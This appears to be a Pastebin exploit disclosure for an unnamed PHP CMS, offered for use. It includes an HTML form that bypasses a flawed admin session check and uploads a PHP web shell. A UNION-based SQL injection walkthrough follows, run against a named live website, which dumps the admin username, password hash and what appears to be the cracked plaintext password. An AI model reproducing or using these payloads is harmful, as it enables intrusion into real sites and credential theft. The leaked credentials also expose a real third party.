Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- I can't find any information in this cms to refer it's webmaster studio and
- the reason to submit this cms+it's vulnerabilities is that: It has a bit funny vulnerabilities)
- CMS: http://www.boxca.com/ql6b1sq3nb79/cms_unknown.rar.html
- Here we go:
- ================VULNERABLE CODE===============
- //admin/en/save_home.php
- <?php
- session_start();
- if(!isset($_SESSION['username']))
- {
- header('Location: ../index.php');
- }
- ?>
- <?php
- include('../../config.php');
- mysql_connect($hostname, $username, $password) or DIE('Connection to host is failed, perhaps the service is down!');
- mysql_select_db($dbname) or DIE('Database name is not available!');
- $home = mysql_query('SELECT title_en, en, image FROM home_text');
- $home = mysql_fetch_array($home);
- $homeServices = mysql_query('SELECT id, en FROM homeservices ORDER BY id asc');
- $homenews = mysql_query('SELECT id,date_en,content_en FROM homenews');
- ?>
- <?php
- $err = "?";
- $uploaddir = '../../images/';
- $img =$home['image'];
- if($_FILES['file']['name'] != ''){
- if(file_exists($uploaddir . $_FILES['file']['name'])){
- $err .="&imgexist=". $_FILES['file']['name'];
- header('Location: admin_index.php' . $err);
- }
- move_uploaded_file($_FILES['file']['tmp_name'], $uploaddir . $_FILES['file']['name']);
- $image = '../images/' . $_FILES['file']['name'];
- mysql_query('UPDATE home_text SET image="' . $image . '"');
- echo mysql_error();
- if($img != ''){
- unlink('../' . $img);
- }
- }
- if(stripslashes($_POST['title']) != $home['title_en'])
- {
- $str= mysql_real_escape_string(stripslashes($_POST['title']));
- mysql_query('UPDATE home_text SET title_en="' . $str . '"');
- }
- if(stripslashes($_POST['about']) != $home['en'])
- {
- $str= mysql_real_escape_string(stripslashes($_POST['about']));
- mysql_query('UPDATE home_text SET en=\'' . $str . '\'');
- }
- for($i = 0; $i < count($_POST['serv_arr']) ; $i++)
- {
- $data = mysql_fetch_array($homeServices);
- if($_POST['serv_arr'][$i] != ""){
- if(stripslashes($_POST['serv_arr'][$i]) != $data['en']){
- $str = mysql_real_escape_string(stripslashes($_POST['serv_arr'][$i]));
- mysql_query('UPDATE homeservices SET en="'.$str. '" WHERE id="' . $data['id'] . '"');
- }
- }
- else{
- mysql_query('DELETE FROM homeservices WHERE id=' . $data['id'] );
- }
- }
- if($_POST['new_serv'] !=""){
- $str = mysql_real_escape_string(stripslashes($_POST['new_serv']));
- mysql_query('INSERT INTO homeservices(en) VALUES("' . $str .'")');
- }
- for($i = 0; $i < count($_POST['date']) ; $i++)
- {
- $data = mysql_fetch_array($homenews);
- if($_POST['date'][$i] != $data['date_en'] || $_POST['new'][$i] != $data['content_en']){
- $str1 = mysql_real_escape_string(stripslashes($_POST['date'][$i]));
- $str2 = mysql_real_escape_string(stripslashes($_POST['new'][$i]));
- mysql_query('UPDATE homenews SET date_en="' . $str1 . '" WHERE id=' .$data['id'] );
- mysql_query('UPDATE homenews SET content_en="' . $str2 .'" WHERE id=' .$data['id']);
- }
- }
- header('Location: admin_index.php?page=home');
- ?>
- ============END OF VULNERABLE CODE=============
- Notice Flaw in session checking thing)
- Here is our:
- ====AUTH BYPASS + REMOTE SHELL UPLOAD EXPLOIT===
- <!DOCTYPE HTML>
- <head>
- <title></title>
- </head>
- <body>
- <center>
- <form method="post" action="http://TARGET_SITE/admin/en/save_home.php" enctype="multipart/form-data">
- <input type="hidden" name="title" value="SIKDIR!">
- <br>
- <br>
- <label>Selet your backdoor:(1)</label>
- <input type="file" name="file" accept="image/*">==>(2)
- <input type="hidden" name="about" readonly="true" value="Sikdir!">
- <input type="hidden" name="serv_arr[]" value="SIKDIR!">
- <input type="hidden" name="serv_arr[]" value="SIKDIR!">
- <input type="hidden" name="serv_arr[]" value="SIKDIR!">
- <input type="hidden" name="serv_arr[]" value="SIKDIR!">
- <input type="hidden" name="serv_arr[]" value="SIKDIR!">
- <input type="hidden" name="serv_arr[]" value="SIKDIR!">
- <input type="hidden" name="new_serv" placeholder="SIKDIR!">
- <input type="hidden" name="date[]" value="sikdir!">
- <input type="hidden" name="new[]" value="AUTH BYPASS + SHELL UPLOAD EXPLOIT BY AKASTEP">
- <input type="hidden" name="date[]" value="SIKDIR!">
- <input type="hidden" name="new[]" value="sikdir!">
- <input type="submit" value="PwN IT ASAP))">
- <!-- You shell can be found here:=> site.tld/images/yourfilename.php -->
- </form>
- </center>
- </body>
- </html>
- ==============END OF EXPLOIT================
- BLind SQLi Vulnerability:
- ==============Vulnerable Code==================
- //ru/services.php
- <?php
- $id = mysql_query('SELECT max(id) as max, min(id) as min FROM services');
- $id = mysql_fetch_array($id);
- if(isset($_GET['id']) && $_GET['id'] >=$id['min'] && $_GET['id'] <= $id['max'])
- {
- $text = mysql_query('SELECT image,service_name_ru,service_full_text_ru FROM services where id=' . $_GET["id"]);
- $text = mysql_fetch_array($text);
- echo '<div class="serv_image">
- <img style="margin-top: 80px;" src="' . $text["image"] . '" width="345" height="210" alt="FINTAX" />
- <div class="shad_left"></div>
- <div class="shad_right"></div>
- </div>
- <div class="serv_text">
- <p class="service_title">' . $text["service_name_ru"] . '</p>
- <p class="service_description">' . $text["service_full_text_ru"] . '</p>
- </div>
- <div class="clear"></div>';
- }
- ==============END OF Vulnerable Code============
- http://www.fintax.am/ru/index.php?page=services&id=1 order by 3--
- 1,2,3
- http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,2,3 LIMIT 1 offset 1*/--
- 5.1.62-cll
- http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(column_name) from information_schema.columns limit 1)),3 limit 1 offset 1*/--
- mysql> select 0x7573657273 \g
- --------------
- | 0x7573657273 |
- --------------
- | users |
- --------------
- 1 row in set (0.00 sec)
- mysql>
- http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(table_name) from information_schema.tables where table_schema=database() limit 1 offset 11)),3 limit 1 offset 1*/--
- COlumnlari:
- http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(column_name) from information_schema.columns where table_name=0x7573657273 limit 1 offset 0)),3 limit 1 offset 1*/--
- id
- hex(group_concat(username,0x7c,password)) from users
- username
- mysql> select 0x757365726E616D65 \g
- --------------------
- | 0x757365726E616D65 |
- --------------------
- | username |
- --------------------
- 1 row in set (0.00 sec)
- password
- mysql> select 0x70617373776F7264 \g
- --------------------
- | 0x70617373776F7264 |
- --------------------
- | password |
- --------------------
- 1 row in set (0.00 sec)
- http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select hex(group_concat(username,0x7c,password)) from users)),3 limit 1 offset 1*/--
- mysql> select 0x66696E746178323031327C3636363961386131323331303665366130643364373665386365616261626638 \
- -> \g
- ------------------------------------------------------------------------------------------
- | 0x66696E746178323031327C3636363961386131323331303665366130643364373665386365616261626638 |
- ------------------------------------------------------------------------------------------
- | fintax2012|6669a8a123106e6a0d3d76e8ceababf8 |
- ------------------------------------------------------------------------------------------
- 1 row in set (0.00 sec)
- mysql>
- http://www.fintax.am/ru/index.php?page=services&id=1 /*!40101 UNION SELECT 1,((select convert(group_concat(username,0x7c,password) using latin1) from users)),3 limit 1 offset 1*/--
- fintax2012|6669a8a123106e6a0d3d76e8ceababf8
- fintax2012
- supersecret1010
- And Finally i want to say that you can fingerprint this cms using the following technique:
- When entering incorrect password for admin it gives
- header('Location: index.php?err=asd');
- /admin/index.php?err=asd
- Notice: asd <= This is a hardcoded value in /admin/loginproc.php
- ================================================
- SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
- ================================================
- packetstormsecurity.org
- packetstormsecurity.com
- packetstormsecurity.net
- securityfocus.com
- cxsecurity.com
- security.nnov.ru
- securtiyvulns.com
- securitylab.ru
- secunia.com
- securityhome.eu
- exploitsdownload.com
- exploit-db.com
- osvdb.com
- websecurity.com.ua
- to all Aa Team + to all Azerbaijan Black HatZ +
- *Especially to my bro CAMOUFL4G3 *
- Also special thanks to: ottoman38 & HERO_AZE
- ================================================
- /AkaStep
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement